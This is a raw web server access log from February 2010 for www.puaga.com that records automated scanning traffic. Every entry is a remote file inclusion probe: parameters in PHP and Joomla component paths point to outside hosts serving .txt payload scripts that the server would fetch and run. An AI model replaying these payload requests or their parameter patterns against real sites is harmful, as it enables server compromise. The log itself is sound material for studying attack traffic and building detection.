61.63.82.14 - - [12/Feb/2010:09:06:58 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:06:58 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:06:58 -0800] "GET /logs/access_100115.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:08:12 -0800] "GET /error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:08:12 -0800] "GET /logs/access_100117.log%20%20/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:08:44 -0800] "GET /logs/access_100117.log%20%20/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:08:44 -0800] "GET /error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:08:44 -0800] "GET /logs/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:08:54 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:08:54 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:30 -0800] "GET /logs/access_100117.log%20%20/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:30 -0800] "GET /logs/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:30 -0800] "GET /error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:33 -0800] "GET /logs/access_100117.log%20%20/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:33 -0800] "GET /logs/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:33 -0800] "GET /error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:58 -0800] "GET /logs/access_100117.log%20%20/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:58 -0800] "GET /error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:09:58 -0800] "GET /logs/error.php?dir=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:09:10:03 -0800] "GET /delete_all.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:09:10:03 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:10:45 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:11:08 -0800] "GET /logs/access_100120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:11:13 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:17 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:17 -0800] "GET /logs/access_100105.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:17 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:19 -0800] "GET /logs/access_100105.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:19 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:19 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:20 -0800] "GET /logs/access_100125.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:20 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:20 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:29 -0800] "GET /logs/access_100125.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:29 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:11:29 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:11:38 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:09:12:33 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:09:12:33 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:09:12:33 -0800] "GET /logs/access_100118.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:12:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:12:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:12:42 -0800] "GET /logs/access_100107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:09:12:45 -0800] "GET /logs/access_100119.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:12:47 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:12:56 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:12:56 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:12:56 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:13:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:13:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:13:20 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:13:31 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:13:35 -0800] "GET /logs/access_100112.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:13:38 -0800] "GET /logs/access_100112.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:13:41 -0800] "GET /logs/access_100111.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [12/Feb/2010:09:13:48 -0800] "GET /logs/access_100111.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:12 -0800] "GET //vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:12 -0800] "GET /logs///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:12 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:15 -0800] "GET //vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:15 -0800] "GET /logs///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:14:16 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:14:16 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:15:04 -0800] "GET /logs/access_100107.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:09:15:08 -0800] "GET /logs/access_100125.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:15:19 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:15:19 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:15:19 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:16:30 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:16:35 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:16:35 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:16:35 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:16:35 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:16:57 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:17:28 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:17:28 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:17:33 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:17:40 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:17:52 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:17:52 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:17:52 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:09:17:52 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:18:26 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:18:26 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:18:26 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:18:29 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:18:29 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:18:36 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:18:42 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:01 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:01 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:05 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:13 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:57 -0800] "GET /logs///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:57 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:19:57 -0800] "GET //vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:20:11 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:20:15 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:20:15 -0800] "GET //vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:09:20:15 -0800] "GET /logs///vwar/backup/errors.php?error=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:09:20:44 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:09:21:46 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:09:21:47 -0800] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:09:21:47 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:21:47 -0800] "GET /logs/access_100109.log%20%20//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:21:47 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:21:47 -0800] "GET /index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:22:20 -0800] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:22:20 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:22:20 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:23:27 -0800] "GET /logs/access_100109.log//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:23:33 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
